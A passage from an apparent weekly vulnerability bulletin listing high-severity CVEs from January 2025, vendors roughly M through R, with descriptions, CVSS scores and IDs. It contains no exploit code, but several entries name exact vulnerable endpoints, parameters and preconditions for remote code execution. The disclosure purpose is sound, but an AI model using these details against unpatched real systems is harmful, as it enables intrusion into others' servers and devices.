In wlan STA FW, there is a possible out of bounds write due to improper input validation. This could lead to remote (proximal/adjacent) code execution with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: WCNCR00389045 / ALPS09136494; Issue ID: MSV-1796. | 2025-01-06 | 9.8 | CVE-2024-20148 |
| Microsoft--Marketplace SaaS |
Improper access control in Azure SaaS Resources allows an authorized attacker to disclose information over a network. | 2025-01-09 | 8.8 | CVE-2025-21380 |
| Microsoft--Microsoft Purview |
A Server-Side Request Forgery (SSRF) vulnerability in Microsoft Purview allows an authorized attacker to disclose information over a network. | 2025-01-09 | 8.8 | CVE-2025-21385 |
| Mindvalley--MindValley Super PageMash |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Mindvalley MindValley Super PageMash allows SQL Injection.This issue affects MindValley Super PageMash: from n/a through 1.1. | 2025-01-07 | 7.6 | CVE-2025-22502 |
| mmrs151--Prayer Times Anywhere |
Cross-Site Request Forgery (CSRF) vulnerability in mmrs151 Prayer Times Anywhere allows Stored XSS.This issue affects Prayer Times Anywhere: from n/a through 2.0.1. | 2025-01-07 | 7.1 | CVE-2025-22590 |
| mulika--MIPL WC Multisite Sync Synchronize WC Products, Orders, Customers & Coupons across multiple sites |
The MIPL WC Multisite Sync plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.1.5 via the 'mipl_wc_sync_download_log' action. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information. | 2025-01-07 | 7.5 | CVE-2024-12152 |
| Minjun Kim--NAVER Analytics |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in (Minjun Kim) NAVER Analytics allows Stored XSS.This issue affects NAVER Analytics: from n/a through 0.9. | 2025-01-07 | 7.1 | CVE-2024-51700 |
| n/a--n/a |
An issue was discovered in EyesOfNetwork (EON) through 5.3.11. Privilege escalation can be accomplished on the server because nmap can be run as root. The attacker achieves total control over the server. | 2025-01-07 | 9.8 | CVE-2022-41572 |
| n/a--n/a |
An issue was discovered in Ovidentia 8.3. The file upload feature does not prevent the uploading of executable files. A user can upload a .png file containing PHP code and then rename it to have the .php extension. It will then be accessible at an images/common/ URI for remote code execution. | 2025-01-07 | 9.8 | CVE-2022-41573 |
| n/a--n/a |
An issue was discovered in Opsview Monitor Agent 6.8. An unauthenticated remote attacker can call check_nrpe against affected targets, specifying known NRPE plugins, which in default installations are configured to accept command control characters and pass them to command-line interpreters for NRPE plugin execution. This allows the attacker to escape NRPE plugin execution and execute commands remotely on the target as NT_AUTHORITY\SYSTEM. | 2025-01-09 | 9.8 | CVE-2023-28354 |
| n/a--n/a |
An XML External Entity (XXE) injection vulnerability in Intersec Geosafe-ea 2022.12, 2022.13, and 2022.14 allows attackers to perform arbitrary file reading under the privileges of the running process, make SSRF requests, or cause a Denial of Service (DoS) via unspecified vectors. | 2025-01-07 | 9.1 | CVE-2024-35532 |
| n/a--n/a |
An Escalation of Privilege security vulnerability was found in SecureAge Security Suite software 7.0.x before 7.0.38, 7.1.x before 7.1.11, 8.0.x before 8.0.18, and 8.1.x before 8.1.18 that allows arbitrary file creation, modification and deletion. | 2025-01-06 | 9.8 | CVE-2024-46622 |
| n/a--n/a |
Server-Side Template Injection (SSTI) was found in AdPortal 3.0.39 allows a remote attacker to execute arbitrary code via the shippingAsBilling and firstname parameters in updateuserinfo.html file | 2025-01-07 | 9.8 | CVE-2024-50658 |
| n/a--n/a |
File Upload Bypass was found in AdPortal 3.0.39 allows a remote attacker to execute arbitrary code via the file upload functionality | 2025-01-07 | 9.8 | CVE-2024-50660 |
| n/a--n/a |
I, Librarian before and including 5.11.1 is vulnerable to Server-Side Request Forgery (SSRF) due to improper input validation in classes/security/validation.php | 2025-01-07 | 9.1 | CVE-2024-54819 |
| n/a--n/a |
SeaCMS V13.1 is vulnerable to Incorrect Access Control. A logic flaw can be exploited by an attacker to allow any user to recharge members indefinitely. | 2025-01-06 | 9.1 | CVE-2024-54879 |
| n/a--n/a |
SeaCMS V13.1 is vulnerable to Incorrect Access Control. A logic flaw can be exploited by an attacker to allow any user to register accounts in bulk. | 2025-01-06 | 9.1 | CVE-2024-54880 |
| n/a--n/a |
An HTML injection vulnerability in Vaultwarden prior to v1.32.5 allows attackers to execute arbitrary code via injecting a crafted payload into the username field of an e-mail message. | 2025-01-09 | 9.6 | CVE-2024-55224 |
| n/a--n/a |
An issue in the component src/api/identity.rs of Vaultwarden prior to v1.32.5 allows attackers to impersonate users, including Administrators, via a crafted authorization request. | 2025-01-09 | 9.8 | CVE-2024-55225 |
| n/a--n/a |
A vulnerability exits in driver SmSerl64.sys in Motorola SM56 Modem WDM Driver v6.12.23.0, which allows low-privileged users to mapping physical memory via specially crafted IOCTL requests . This can be exploited for privilege escalation, code execution under high privileges, and information disclosure. These signed drivers can also be used to bypass the Microsoft driver-signing policy to deploy malicious code. | 2025-01-07 | 9.8 | CVE-2024-55414 |
| n/a--n/a |
Z-BlogPHP 1.7.3 is vulnerable to arbitrary code execution via \zb_users\theme\shell\template. | 2025-01-06 | 9.8 | CVE-2024-55529 |
| n/a--n/a |
A vulnerability in Crater Invoice allows an unauthenticated attacker with knowledge of the APP_KEY to achieve remote command execution on the server by manipulating the laravel_session cookie, exploiting arbitrary deserialization through the encrypted session data. The exploitation vector of this vulnerability relies on an attacker obtaining Laravel's secret APP_KEY, which would allow them to decrypt and manipulate session cookies (laravel_session) containing serialized data. By altering this data and re-encrypting it with the APP_KEY, the attacker could trigger arbitrary deserialization on the server, potentially leading to remote command execution (RCE). The vulnerability is primarily exploited by accessing an exposed cookie and manipulating it using the secret key to gain malicious access to the server. | 2025-01-07 | 9.8 | CVE-2024-55556 |
| n/a--n/a |
A Cross Site Scripting (XSS) vulnerability was found in /landrecordsys/admin/contactus.php in PHPGurukul Land Record System v1.0, which allows remote attackers to execute arbitrary code via the "pagetitle" parameter. | 2025-01-10 | 9.8 | CVE-2024-57686 |
| n/a--n/a |
An OS Command Injection vulnerability was found in /landrecordsys/admin/dashboard.php in PHPGurukul Land Record System v1.0, which allows remote attackers to execute arbitrary code via the "Cookie" GET request parameter. | 2025-01-10 | 9.8 | CVE-2024-57687 |
| n/a--n/a |
An issue was discovered in Inspur ClusterEngine v4.0 that allows attackers to gain escalated Local privileges and execute arbitrary commands via /opt/tsce4/torque6/bin/getJobsByShell. | 2025-01-06 | 8.4 | CVE-2021-27285 |
| n/a--n/a |
An issue was discovered in SuiteCRM 7.12.7. Authenticated users can use CRM functions to upload malicious files. Then, deserialization can be used to achieve code execution. | 2025-01-07 | 8.8 | CVE-2022-45185 |
| n/a--n/a |
An issue was discovered in SuiteCRM 7.12.7. Authenticated users can recover an arbitrary field of a database. | 2025-01-07 | 8.1 | CVE-2022-45186 |
| n/a--n/a |
A vulnerability was found in pgadmin. Users logging into pgAdmin running in server mode using LDAP authentication may be attached to another user's session if multiple connection attempts occur simultaneously. | 2025-01-09 | 8 | CVE-2023-1907 |
| n/a--n/a |
Cross Site Scripting vulnerability in LinZhaoguan pb-cms v.2.0 allows a remote attacker to execute arbitrary code via the theme management function. | 2025-01-09 | 8.8 | CVE-2024-51229 |
| n/a--n/a |
Command Injection in Minidlna version v1.3.3 and before allows an attacker to execute arbitrary OS commands via a specially crafted minidlna.conf configuration file. | 2025-01-08 | 8.8 | CVE-2024-51442 |
| n/a--n/a |
An authenticated arbitrary file upload vulnerability in Car Rental Management System v1.0 to v1.3 allows attackers to execute arbitrary code via uploading a crafted file. | 2025-01-07 | 8.8 | CVE-2024-53345 |
| n/a--n/a |
SourceCodester Computer Laboratory Management System 1.0 is vulnerable to Incorrect Access Control. via /php-lms/admin/?page=user/list. | 2025-01-08 | 8.8 | CVE-2024-54818 |
| n/a--n/a |
An issue in the snxpcamd.sys component of SUNIX Multi I/O Card v10.1.0.0 allows attackers to perform arbitrary read and write actions via supplying crafted IOCTL requests. | 2025-01-07 | 8.8 | CVE-2024-55411 |
| n/a--n/a |
An issue was discovered in the Interllect Core Search in Polaris FT Intellect Core Banking 9.5. Input passed through the groupType parameter in /SCGController is mishandled before being used in SQL queries, allowing SQL injection in an authenticated session. | 2025-01-08 | 8.8 | CVE-2024-55517 |
| n/a--n/a |
Invoice Ninja before 5.10.43 allows remote code execution from a pre-authenticated route when an attacker knows the APP_KEY. This is exacerbated by .env files, available from the product's repository, that have default APP_KEY values. The route/{hash} route defined in the invoiceninja/routes/client.php file can be accessed without authentication. The parameter {hash} is passed to the function decrypt that expects a Laravel ciphered value containing a serialized object. (Furthermore, Laravel contains several gadget chains usable to trigger remote command execution from arbitrary deserialization.) Therefore, an attacker in possession of the APP_KEY is able to fully control a string passed to an unserialize function. | 2025-01-07 | 8.8 | CVE-2024-55555 |
| n/a--n/a |
A flaw was found in FFmpeg's DASH playlist support. This vulnerability allows arbitrary HTTP GET requests to be made on behalf of the machine running FFmpeg via a crafted DASH playlist containing malicious URLs. | 2025-01-06 | 7.2 | CVE-2023-6605 |
| n/a--n/a |
Stack Buffer Overflow in PX4-Autopilot v1.14.3, which allows attackers to execute commands to exploit this vulnerability and cause the program to refuse to execute | 2025-01-07 | 7.9 | CVE-2024-40427 |
| n/a--n/a |
An issue in the validate_email function in CTFd/utils/validators/__init__.py of CTFd 3.7.3 allows attackers to cause a Regular expression Denial of Service (ReDoS) via supplying a crafted string as e-mail address during registration. | 2025-01-07 | 7.5 | CVE-2024-46242 |
| n/a--n/a |
In PRIMX ZED Enterprise up to 2024.3, technical files stored in local folders with common user access can be manipulated to render the host computer unavailable or to execute programs with an elevation of privilege. | 2025-01-09 | 7.8 | CVE-2024-46464 |
| n/a--n/a |
Elspec Engineering G5 Digital Fault Recorder Firmware v1.2.1.12 was discovered to contain a buffer overflow. | 2025-01-07 | 7.5 | CVE-2024-46601 |
| n/a--n/a |
An issue was discovered in Elspec G5 digital fault recorder version 1.2.1.12 and earlier. An XML External Entity (XXE) vulnerability may allow an attacker to cause a Denial of Service (DoS) via a crafted XML payload. | 2025-01-07 | 7.5 | CVE-2024-46602 |
| n/a--n/a |
An XML External Entity (XXE) vulnerability in Elspec Engineering G5 Digital Fault Recorder Firmware v1.2.1.12 allows attackers to cause a Denial of Service (DoS) via a crafted XML payload. | 2025-01-07 | 7.5 | CVE-2024-46603 |
| n/a--n/a |
Vehicle Management System 1.0 is vulnerable to SQL Injection. A guest user can exploit vulnerable POST parameters in various administrative actions, such as booking a vehicle or confirming a booking. The affected parameters include "Booking ID", "Action Name", and "Payment Confirmation ID", which are present in /newvehicle.php and /newdriver.php. | 2025-01-07 | 7.2 | CVE-2024-48245 |
| n/a--n/a |
An issue in Netis Wifi6 Router NX10 2.0.1.3643 and 2.0.1.3582 and Netis Wifi 11AC Router NC65 3.0.0.3749 and Netis Wifi 11AC Router NC63 3.0.0.3327 and 3.0.0.3503 and Netis Wifi 11AC Router NC21 3.0.0.3800, 3.0.0.3500 and 3.0.0.3329 and Netis Wifi Router MW5360 1.0.1.3442 and 1.0.1.3031 allows a remote attacker to obtain sensitive information via the parameter password at the change admin password page at the router web interface. | 2025-01-06 | 7.5 | CVE-2024-48456 |
| n/a--n/a |
An issue in Netis Wifi6 Router NX10 2.0.1.3643 and 2.0.1.3582 and Netis Wifi 11AC Router NC65 3.0.0.3749 and Netis Wifi 11AC Router NC63 3.0.0.3327 and 3.0.0.3503 and Netis Wifi 11AC Router NC21 3.0.0.3800, 3.0.0.3500 and 3.0.0.3329 and Netis Wifi Router MW5360 1.0.1.3442 and 1.0.1.3031 allows a remote attacker to obtain sensitive information via the endpoint /cgi-bin/skk_set.cgi and binary /bin/scripts/start_wifi.sh | 2025-01-06 | 7.5 | CVE-2024-48457 |
| n/a--n/a |
Bangkok Medical Software HOSxP XE v4.64.11.3 was discovered to contain a hardcoded IDEA Key-IV pair in the HOSxPXE4.exe and HOS-WIN32.INI components. This allows attackers to access sensitive information. | 2025-01-07 | 7.5 | CVE-2024-53522 |
| n/a--n/a |
The com.windymob.callscreen.ringtone.callcolor.colorphone (aka Color Phone Call Screen Themes) application through 1.1.2 for Android enables any application (with no permissions) to place phone calls without user interaction by sending a crafted intent via the com.frovis.androidbase.call.DialerActivity component. | 2025-01-06 | 7.7 | CVE-2024-53934 |
| n/a--n/a |
An access control issue in the component /juis_boxinfo.xml of AVM FRITZ!Box 7530 AX v7.59 allows attackers to obtain sensitive information without authentication. | 2025-01-06 | 7.5 | CVE-2024-54767 |
| n/a--n/a |
JATOS 3.9.4 contains a denial-of-service (DoS) vulnerability in the authentication system, where an attacker can prevent legitimate users from accessing their accounts by repeatedly sending multiple failed login attempts. Specifically, by submitting 3 incorrect login attempts every minute, the attacker can trigger the account lockout mechanism on the account level, effectively locking the user out indefinitely. Since the lockout is applied to the user account and not based on the IP address, any attacker can trigger the lockout on any user account, regardless of their privileges. | 2025-01-07 | 7.5 | CVE-2024-55008 |
| n/a--n/a |
An issue in the DeviceloControl function of ITE Tech. Inc ITE IO Access v1.0.0.0 allows attackers to perform arbitrary port read and write actions via supplying crafted IOCTL requests. | 2025-01-06 | 7.8 | CVE-2024-55407 |
| n/a--n/a |
An issue in the 690b33e1-0462-4e84-9bea-c7552b45432a.sys component of Asus GPU Tweak II Program Driver v1.0.0.0 allows attackers to perform arbitrary read and write actions via supplying crafted IOCTL requests. | 2025-01-07 | 7.8 | CVE-2024-55410 |
| n/a--n/a |
A vulnerability exits in driver snxpsamd.sys in SUNIX Serial Driver x64 - 10.1.0.0, which allows low-privileged users to read and write arbitary i/o port via specially crafted IOCTL requests . This can be exploited for privilege escalation, code execution under high privileges, and information disclosure. These signed drivers can also be used to bypass the Microsoft driver-signing policy to deploy malicious code. | 2025-01-07 | 7.8 | CVE-2024-55412 |
| n/a--n/a |
A vulnerability exits in driver snxppamd.sys in SUNIX Parallel Driver x64 - 10.1.0.0, which allows low-privileged users to read and write arbitary i/o port via specially crafted IOCTL requests . This can be exploited for privilege escalation, code execution under high privileges, and information disclosure. These signed drivers can also be used to bypass the Microsoft driver-signing policy to deploy malicious code. | 2025-01-07 | 7.8 | CVE-2024-55413 |
| n/a--n/a |
In FRRouting (FRR) before 10.3 from 6.0 onward, all routes are re-validated if the total size of an update received via RTR exceeds the internal socket's buffer size, default 4K on most OSes. An attacker can use this to trigger re-parsing of the RIB for FRR routers using RTR by causing more than this number of updates during an update interval (usually 30 minutes). Additionally, this effect regularly occurs organically. Furthermore, an attacker can use this to trigger route validation continuously. Given that routers with large full tables may need more than 30 minutes to fully re-validate the table, continuous issuance/withdrawal of large numbers of ROA may be used to impact the route handling performance of all FRR instances using RPKI globally. Additionally, the re-validation will cause heightened BMP traffic to ingestors. Affected Versions: FRRouting <6.0. Fixed Versions: 10.0.3, 10.1.2, 10.2.1, >= 10.3. | 2025-01-06 | 7.5 | CVE-2024-55553 |
| Nabaraj Chapagain--NC Wishlist for Woocommerce |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Nabaraj Chapagain NC Wishlist for Woocommerce allows SQL Injection.This issue affects NC Wishlist for Woocommerce: from n/a through 1.0.1. | 2025-01-09 | 8.5 | CVE-2025-22505 |
| NETGEAR--DGN1000 |
NETGEAR DGN1000 before 1.1.00.48 is vulnerable to an authentication bypass vulnerability. A remote and unauthenticated attacker can execute arbitrary operating system commands as root by sending crafted HTTP requests to the setup.cgi endpoint. This vulnerability has been exploited in the wild since at least 2017. | 2025-01-10 | 9.8 | CVE-2024-12847 |
| nickboss--WordPress File Upload |
The WordPress File Upload plugin for WordPress is vulnerable to Remote Code Execution, Arbitrary File Read, and Arbitrary File Deletion in all versions up to, and including, 4.24.15 via the 'wfu_file_downloader.php' file. This is due to lack of proper sanitization of the 'source' parameter and allowing a user-defined directory path. This makes it possible for unauthenticated attackers to execute code on the server. | 2025-01-08 | 9.8 | CVE-2024-11613 |
| nickboss--WordPress File Upload |
The WordPress File Upload plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 4.24.12 via the 'wfu_ABSPATH' cookie parameter. This makes it possible for unauthenticated attackers to execute code on the server. | 2025-01-08 | 9.8 | CVE-2024-11635 |
| nickboss--WordPress File Upload |
The WordPress File Upload plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 4.24.13 via wfu_file_downloader.php. This makes it possible for unauthenticated attackers to read files outside of the originally intended directory. | 2025-01-08 | 7.5 | CVE-2024-9939 |
| Nik Chankov--Autocompleter |
Cross-Site Request Forgery (CSRF) vulnerability in Nik Chankov Autocompleter allows Stored XSS.This issue affects Autocompleter: from n/a through 1.3.5.2. | 2025-01-07 | 7.1 | CVE-2025-22325 |
| nilsonLazarin--WeGIA |
WeGIA is a web manager for charitable institutions. Prior to 3.2.8, a critical vulnerability was identified in the /WeGIA/html/socio/sistema/controller/controla_xlsx.php endpoint. The endpoint accepts file uploads without proper validation, allowing the upload of malicious files, such as .phar, which can then be executed by the server. This vulnerability is fixed in 3.2.8. | 2025-01-07 | 9.9 | CVE-2025-22133 |
| nilsonLazarin--WeGIA |
WeGIA is a web manager for charitable institutions. A Cross-Site Scripting (XSS) vulnerability was identified in the file upload functionality of the WeGIA/html/socio/sistema/controller/controla_xlsx.php endpoint. By uploading a file containing malicious JavaScript code, an attacker can execute arbitrary scripts in the context of a victim's browser. This can lead to information theft, session hijacking, and other forms of client-side exploitation. This vulnerability is fixed in 3.2.7. | 2025-01-07 | 8.3 | CVE-2025-22132 |
| Noel Jarencio.--Smoothness Slider Shortcode |
Cross-Site Request Forgery (CSRF) vulnerability in Noel Jarencio. Smoothness Slider Shortcode allows Cross Site Request Forgery.This issue affects Smoothness Slider Shortcode: from n/a through v1.2.2. | 2025-01-07 | 7.1 | CVE-2025-22555 |
| Ofek Nakar--Virtual Bot |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Ofek Nakar Virtual Bot allows Blind SQL Injection.This issue affects Virtual Bot: from n/a through 1.0.0. | 2025-01-09 | 9.3 | CVE-2025-22542 |
| Ofek Nakar--Virtual Bot |
Cross-Site Request Forgery (CSRF) vulnerability in Ofek Nakar Virtual Bot allows Stored XSS.This issue affects Virtual Bot: from n/a through 1.0.0. | 2025-01-07 | 7.1 | CVE-2025-22538 |
| OISF--suricata |
Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to 7.0.8, a large input buffer to the to_lowercase, to_uppercase, strip_whitespace, compress_whitespace, dotprefix, header_lowercase, strip_pseudo_headers, url_decode, or xor transform can lead to a stack overflow causing Suricata to crash. The issue has been addressed in Suricata 7.0.8. | 2025-01-06 | 7.5 | CVE-2024-55605 |
| OISF--suricata |
Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to version 7.0.8, DNS resource name compression can lead to small DNS messages containing very large hostnames which can be costly to decode, and lead to very large DNS log records. While there are limits in place, they were too generous. The issue has been addressed in Suricata 7.0.8. | 2025-01-06 | 7.5 | CVE-2024-55628 |
| OISF--suricata |
Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to 7.0.8, TCP streams with TCP urgent data (out of band data) can lead to Suricata analyzing data differently than the applications at the TCP endpoints, leading to possible evasions. Suricata 7.0.8 includes options to allow users to configure how to handle TCP urgent data. In IPS mode, you can use a rule such as drop tcp any any -> any any (sid:1; tcp.flags:U*;) to drop all the packets with urgent flag set. | 2025-01-06 | 7.5 | CVE-2024-55629 |
| OpenDDS--DDS |
An attacker can arbitrarily craft malicious DDS Participants (or ROS 2 Nodes) with valid certificates to compromise and get full control of the attacked secure DDS databus system by exploiting vulnerable attributes in the configuration of PKCS#7 certificate's validation. This is caused by a non-compliant implementation of permission document verification used by some DDS vendors. Specifically, an improper use of the OpenSSL PKCS7_verify function used to validate S/MIME signatures. | 2025-01-09 | 8.2 | CVE-2023-24012 |
| OpenHarmony--OpenHarmony |
in OpenHarmony v4.1.2 and prior versions allow a local attacker cause the device is unable to boot up through out-of-bounds write. | 2025-01-07 | 8.8 | CVE-2024-47398 |
| Opentracker--Opentracker Analytics |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Opentracker Opentracker Analytics allows Reflected XSS.This issue affects Opentracker Analytics: from n/a through 1.3. | 2025-01-09 | 7.1 | CVE-2025-22361 |
| OpenVPN--OpenVPN |
OpenVPN before 2.6.11 does not santize PUSH_REPLY messages properly which attackers can use to inject unexpected arbitrary data into third-party executables or plug-ins. | 2025-01-06 | 9.1 | CVE-2024-5594 |
| OpenVPN--OpenVPN Connect |
OpenVPN Connect before version 3.5.0 can contain the configuration profile's clear-text private key which is logged in the application log, which an unauthorized actor can use to decrypt the VPN traffic | 2025-01-06 | 7.5 | CVE-2024-8474 |
| OTWthemes--Widgetize Pages Light |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in OTWthemes Widgetize Pages Light allows Reflected XSS.This issue affects Widgetize Pages Light: from n/a through 3.0. | 2025-01-09 | 7.1 | CVE-2025-22313 |
| Owen Cutajar & Hyder Jaffari--WordPress Auction Plugin |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Owen Cutajar & Hyder Jaffari WordPress Auction Plugin allows SQL Injection.This issue affects WordPress Auction Plugin: from n/a through 3.7. | 2025-01-07 | 7.6 | CVE-2025-22349 |
| P3JX--Cf7Save Extension |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in P3JX Cf7Save Extension allows Reflected XSS.This issue affects Cf7Save Extension: from n/a through 1. | 2025-01-09 | 7.1 | CVE-2025-22331 |
| payuplugin--PayU CommercePro Plugin |
The PayU CommercePro Plugin plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 3.8.3. This is due to /wp-json/payu/v1/generate-user-token and /wp-json/payu/v1/get-shipping-cost REST API endpoints not properly verifying a user's identity prior to setting the users ID and auth cookies. This makes it possible for unauthenticated attackers to create new administrative user accounts. | 2025-01-07 | 9.8 | CVE-2024-12264 |
| Pektsekye--Notify Odoo |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Pektsekye Notify Odoo allows Stored XSS.This issue affects Notify Odoo: from n/a through 1.0.0. | 2025-01-07 | 7.1 | CVE-2024-56299 |
| PenguinArts--Contact Form 7 Database CFDB7 |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in PenguinArts Contact Form 7 Database - CFDB7 allows SQL Injection.This issue affects Contact Form 7 Database - CFDB7: from n/a through 1.0.0. | 2025-01-07 | 7.6 | CVE-2025-22351 |
| PJFC--SyncFields |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PJFC SyncFields allows Reflected XSS.This issue affects SyncFields: from n/a through 2.1. | 2025-01-07 | 7.1 | CVE-2025-22359 |
| plainware.com--Locatoraid Store Locator |
Deserialization of Untrusted Data vulnerability in plainware.com Locatoraid Store Locator allows Object Injection.This issue affects Locatoraid Store Locator: from n/a through 3.9.50. | 2025-01-07 | 8.1 | CVE-2024-56283 |
| plainware.com--PlainInventory |
Deserialization of Untrusted Data vulnerability in plainware.com PlainInventory allows Object Injection.This issue affects PlainInventory: from n/a through 3.1.6. | 2025-01-07 | 8.1 | CVE-2024-56291 |
| postsaint--Post Saint: ChatGPT, GPT4, DALL-E, Stable Diffusion, Pexels, Dezgo AI Text & Image Generator |
The Post Saint: ChatGPT, GPT4, DALL-E, Stable Diffusion, Pexels, Dezgo AI Text & Image Generator plugin for WordPress is vulnerable to arbitrary files uploads due to a missing capability check and file type validation on the add_image_to_library AJAX action function in all versions up to, and including, 1.3.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload arbitrary files that make remote code execution possible. | 2025-01-07 | 8.8 | CVE-2024-12471 |
| ProductDyno--ProductDyno |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ProductDyno ProductDyno allows Reflected XSS.This issue affects ProductDyno: from n/a through 1.0.24. | 2025-01-07 | 7.1 | CVE-2025-22320 |
| Progress Software Corporation--Sitefinity |
Improper Neutralization of Input During CMS Backend (adminstrative section) Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Progress Sitefinity.This issue affects Sitefinity: from 4.0 through 14.4.8142, from 15.0.8200 through 15.0.8229, from 15.1.8300 through 15.1.8327, from 15.2.8400 through 15.2.8421. | 2025-01-07 | 8.4 | CVE-2024-11626 |
| Progress Software Corporation--Sitefinity |
Information Exposure Through an Error Message vulnerability in Progress Software Corporation Sitefinity.This issue affects Sitefinity: from 4.0 through 14.4.8142, from 15.0.8200 through 15.0.8229, from 15.1.8300 through 15.1.8327, from 15.2.8400 through 15.2.8421. | 2025-01-07 | 7.7 | CVE-2024-11625 |
| qualcomm -- fastconnect_6700_firmware |
Memory corruption while processing IPA statistics, when there are no active clients registered. | 2025-01-06 | 8.4 | CVE-2024-21464 |
| Qualcomm, Inc.--Snapdragon |
Memory corruption can occur if an already verified IFS2 image is overwritten, bypassing boot verification. This allows unauthorized programs to be injected into security-sensitive images, enabling the booting of a tampered IFS2 system image. | 2025-01-06 | 8.4 | CVE-2024-45555 |
| Qualcomm, Inc.--Snapdragon |
Uncontrolled resource consumption when a driver, an application or a SMMU client tries to access the global registers through SMMU. | 2025-01-06 | 7.5 | CVE-2024-43064 |
| Qualcomm, Inc.--Snapdragon |
Memory corruption when IOCTL call is invoked from user-space to read board data. | 2025-01-06 | 7.8 | CVE-2024-45541 |
| Qualcomm, Inc.--Snapdragon |
Memory corruption when IOCTL call is invoked from user-space to write board data to WLAN driver. | 2025-01-06 | 7.8 | CVE-2024-45542 |
| Qualcomm, Inc.--Snapdragon |
Memory corruption while processing FIPS encryption or decryption IOCTL call invoked from user-space. | 2025-01-06 | 7.8 | CVE-2024-45546 |
| Qualcomm, Inc.--Snapdragon |
Memory corruption while processing IOCTL call invoked from user-space to verify non extension FIPS encryption and decryption functionality. | 2025-01-06 | 7.8 | CVE-2024-45547 |
| Qualcomm, Inc.--Snapdragon |
Memory corruption while processing FIPS encryption or decryption validation functionality IOCTL call. | 2025-01-06 | 7.8 | CVE-2024-45548 |
| Qualcomm, Inc.--Snapdragon |
Memory corruption occurs when invoking any IOCTL-calling application that executes all MCDM driver IOCTL calls. | 2025-01-06 | 7.8 | CVE-2024-45550 |
| Qualcomm, Inc.--Snapdragon |
Memory corruption can occur when process-specific maps are added to the global list. If a map is removed from the global list while another thread is using it for a process-specific task, issues may arise. | 2025-01-06 | 7.8 | CVE-2024-45553 |
| Qualcomm, Inc.--Snapdragon |
Transient DOS can occur when the driver parses the per STA profile IE and tries to access the EXTN element ID without checking the IE length. | 2025-01-06 | 7.5 | CVE-2024-45558 |
| Red Hat--Red Hat Enterprise Linux 6 |
A vulnerability was found in Ruby. The Ruby interpreter is vulnerable to the Marvin Attack. This attack allows the attacker to decrypt previously encrypted messages or forge signatures by exchanging a large number of messages with the vulnerable service. | 2025-01-09 | 7.4 | CVE-2025-0306 |
| redis--redis |
Redis is an open source, in-memory database that persists on disk. An authenticated user may use a specially crafted Lua script to manipulate the garbage collector and potentially lead to remote code execution. The problem is fixed in 7.4.2, 7.2.7, and 6.2.17. An additional workaround to mitigate the problem without patching the redis-server executable is to prevent users from executing Lua scripts. This can be done using ACL to restrict EVAL and EVALSHA commands. | 2025-01-06 | 7 | CVE-2024-46981 |
| RedisBloom--RedisBloom |
RedisBloom adds a set of probabilistic data structures to Redis. There is an integer overflow vulnerability in RedisBloom, which is a module used in Redis. The integer overflow vulnerability allows an attacker (a redis client which knows the password) to allocate memory in the heap lesser than the required memory due to wraparound. Then read and write can be performed beyond this allocated memory, leading to info leak and OOB write. The integer overflow is in CMS.INITBYDIM command, which initialize a Count-Min Sketch to dimensions specified by user. It accepts two values (width and depth) and uses them to allocate memory in NewCMSketch(). This vulnerability is fixed in 2.2.19, 2.4.12, 2.6.14, and 2.8.2. | 2025-01-08 | 8.8 | CVE-2024-55656 |
| RediSearch--RediSearch |
RediSearch is a Redis module that provides querying, secondary indexing, and full-text search for Redis. An authenticated redis user executing FT.SEARCH or FT.AGGREGATE with a specially crafted LIMIT command argument, or FT.SEARCH with a specially crafted KNN command argument, can trigger an integer overflow, leading to heap overflow and potential remote code execution. This vulnerability is fixed in 2.6.24, 2.8.21, and 2.10.10. Avoid setting value of -1 or large values for configuration parameters MAXSEARCHRESULTS and MAXAGGREGATERESULTS, to avoid exploiting large LIMIT arguments. | 2025-01-08 | 7 | CVE-2024-51737 |
| RedisTimeSeries--RedisTimeSeries |
RedisTimeSeries is a time-series database (TSDB) module for Redis, by Redis. Executing one of these commands TS.QUERYINDEX, TS.MGET, TS.MRAGE, TS.MREVRANGE by an authenticated user, using specially crafted command arguments may cause an integer overflow, a subsequent heap overflow, and potentially lead to remote code execution. This vulnerability is fixed in 1.6.20, 1.8.15, 1.10.15, and 1.12.3. | 2025-01-08 | 7 | CVE-2024-51480 |
| REVE--Antivirus |
A vulnerability classified as critical has been found in REVE Antivirus 1.0.0.0 on Linux. This affects an unknown part of the file /usr/local/reveantivirus/tmp/reveinstall. The manipulation leads to incorrect default permissions. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-01-09 | 7.8 | CVE-2024-13206 |
| Rezgo--Rezgo |
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Rezgo Rezgo allows PHP Local File Inclusion.This issue affects Rezgo: from n/a through 4.15. | 2025-01-07 | 8.1 | CVE-2024-53800 |
| Roninwp--FAT Event Lite |
